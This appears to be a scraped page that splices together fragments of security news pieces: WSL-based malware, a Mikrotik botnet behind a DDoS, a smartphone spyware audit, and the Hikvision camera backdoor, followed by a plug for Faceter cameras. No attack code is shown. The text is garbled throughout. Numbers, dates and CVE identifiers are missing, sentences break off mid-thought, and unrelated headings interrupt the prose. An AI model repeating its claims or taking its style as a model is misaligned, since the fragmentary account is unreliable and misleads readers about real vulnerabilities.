This Week In Security: Somebody’s Watching, Microsoft + Linux, DDoS
The vuln is pre-authentication, and requires no user interaction. This could be something as simple as a language chooser not sanitizing the inputs on the back-end, and being able to use backticks or a semicolon to trigger an arbitrary command.
But if we were betting… Linux Malware on Windows In retrospect it should probably be obvious, but the Windows Subsystem for Linux was destined to be yet another vector for infection for Windows machines.
From there, it makes calls out to the Windows API. The advantage of using WSL for malware is that this escape detection by most of the security products on the market.
Botnets are already scanning the internet for vulnerable machines , and installing malware. The primary payload seems to be a Mirai variant, which among other things closes the vulnerable ports upon infection. This has the potential to be quite a big problem. Smartphone Audit How much do you trust your smartphone? How about a smartphone made by Chinese companies? All three brands are produced by companies based in China, so there are some understandable concerns about potential spyware.
If you think this is overly paranoid, go read about Project Rubicon. The conclusions? Xaiomi devices are actively running spyware and have censorship tools built-in, although they are not actively blocking anything in international models.
The problem here is the app store that ships with those phones. Read the full paper, available here as a PDF. This tool consists of a user-mode application, and a Windows driver running in the kernel.
The front-end application makes IOCTL calls to the driver, which acts as a proxy to forward the calls to various hardware and software endpoints. Any application can make those calls, adding to this recipe for disaster. The attackers claim to be REvil, but that is likely a misdirect. Too many elements are unlike the way REvil operated. For instance, the initial ransom demand was delivered over pastebin, and only asked for a single Bitcoin.
That has since been elevated to Bitcoins. While VoIP. This is an application attack, rather than a raw bandwidth attack, meaning that the emphasis is on flooding the target with bogus requests. When looking at the traffic sources, Qrator found a couple of odd similarities.
Almost all of the IPs had ports and open, a sign of Mikrotik devices. The current theory is that the botnet is almost entirely made up of Mikrotik routers. The last known remotely exploitable flaw in these devices was CVE, fixed back in The number of devices in this botnet is suspiciously similar to the number of vulnerable devices exposed to the internet in
Hikvision Security Cams Compromised to Display “HACKED”
And now, malicious attackers are trying to exploit this vulnerability, the first example is the appearance of HACKED by replacing live feed of some models of Hikvision security cameras. Screenshot from ipcamtalk. On Sep 12, a security researcher using the alias Monte Crypto posted access control bypass in IP cameras from Hikvision on Full Disclosure mailing list and warned users that a majority of these cams contain a backdoor that can let unauthentic impersonation of a configured user account.
In his post on Full Disclosure regarding the vulnerability, it is claimed that there is a superuser admin account in all devices manufactured by Hikvision. This account allows understanding of how to retrieve users and roles, how to download camera configuration and how to get camera snapshot without authentication. Monte Crypto also noted that the vulnerability is not new and has been there in Hikvision products since So what are the consequences of this mishap?
Monte Crypto explained that there are various, negative repercussions of having a security camera with a backdoor installed. Moreover, you can also try to implement network access control rules that let only the trusted IP addresses to establish connections to the devices that are vulnerable.
It is worth noting that Hikvision IP cameras are equipped with UPNP, which is enabled-by-default and can get exposed to the internet automatically.
Hikvision has already released firmware updates for numerous models of its security cameras where the backdoor is removed so you must install the update if it is available for your device. If you attempt to do so then a boot loop will occur, which can only be recovered by installing the original Chinese language firmware over TFTP.
How to hack Hikvision camera (the easy way)
Is safe to use Hikvision cameras? The risk is always there, no matter the device brand.
Hacking the Hikvision: part 1
Historically, Hikvision has presented more security flaws compared to other camera manufacturer but there's always a firmware to correct the problem. So, if you have a Hikvision device just keep it updated and take extra measures to protect your network from hackers to minimize the risks.
Conclusion Hikvsion is a well-known camera manufacturer that sells thousands if cameras around the world and that makes the company a target for hackers. There are a lot of other non-branded Chinese cameras that have security flaws but due to the fact that they are small companies they are not in evidence and don't drive attention to their devices.
Hikvision Patches Backdoor in IP Cameras
Make sure you test your cameras to see if they have some security flaws. As mentioned above, most of the production belongs to China. And we know that not all technology from China is as good as the advertisement says; frequent refusals of the manufacturer in technical support of versions and software products; budget models are not worth the money.
For a HikVision camera to be truly effective, you need to be prepared for high financial costs.
Android in Hikvision video intercoms. Benefits and challeng
A smart camera from Faceter is considered a good alternative. To start video surveillance, you will need: Mobile application download for Android hereor for IOS. The IP camera that you install on the door. Your mobile phone, tablet, laptop or PC as a monitor. Images from cameras will be transmitted to the selected device in real-time and notify in case of unwanted events.
Dahua, Hikvision IoT Devices Under Siege
Karas said the devices in question all were set up to be remotely accessible over the Internet, and were running with the default credentials I sent them an email. If nothing changes, I will publish all details on March 20th, along with the firmware that disables the backdoor. But on Mar. A special bulletin issued Mar. Hikvision strongly recommends that our dealer base review the security levels of equipment installed prior to June to ensure the use of complex passwords and upgraded firmware to best protect their customers.